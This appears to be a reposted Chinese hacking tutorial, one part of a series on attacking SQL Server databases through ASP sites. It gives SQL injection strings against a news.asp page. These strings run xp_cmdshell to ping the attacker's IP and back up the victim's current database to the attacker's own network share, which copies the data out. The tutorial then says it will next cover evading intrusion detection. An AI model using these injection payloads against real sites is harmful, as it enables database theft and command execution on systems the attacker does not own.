SQL Server安全专题"SQL Server数据库的一些攻击

核心提示： 但是我们不知道库名该怎么？看看db_name()函数吧打开你的query analyzer，看看print db_name() ，SQL Server安全专题"SQL Server数据库的一些攻击(3)，呵呵，当前的数据库名就出来了以次类推，你又是拨号上网，呵呵，如下： decl

但是我们不知道库名该怎么？看看db_name()函数吧

打开你的query analyzer，看看print db_name() ，呵呵，当前的数据库名就出来了

以次类推，如下： declare @a sysname;set @a=db_name();backup database @a to disk='你的IP你的共享目录bak.dat' ,name='test';--

呵呵，他的当前数据库就备份到你的硬盘上了，接下来要做的大家心里都明白了吧

同理这个方法可以找到对方的SQL的IP

先装一个防火墙，打开ICMP和139TCP和445TCP的警告提示

然后试试看news.asp?id=2;exec master.dbo.xp_cmdshell 'ping 你的IP'

如果防火墙提示有人ping你，那么因该可以肯定对方的ASP用的是SQL的管理员权限，同时也确定了对方的SQL Server的准确位置，因为很多大 一点的网站考虑性能，会把web服务和数据库分开，当对方大上了补丁看不到源代码时，我想只有这个方法能很快的定位对方的SQL Server的位置了

那么，如果对方ASP没有SQL管理员权限，我们就不能调用xp_cmdshell了，该怎么办？

别着急，试试看这个news.asp?id=2;declare @a;set @a=db_name();backup database @a to disk='你的IP你的共享目录bak.dat' ,name='test';--

呵呵，你的防火墙该发出警告了，有人连接你的445或139(win9端口了，这样，对方的SQL的ip一样也可以暴露

那么如果对方连某个数据库的owner也不是的话，我们该怎么办？下次我会告诉大家一个更好的办法。

其实backuo database到你的硬盘还是有点夸张了，如果对方数据库很庞大，你又是拨号上网，呵呵，劝你别试了，很难成功传输的

稍后我们还会谈到如何骗过IDS执行ASP+SQL入侵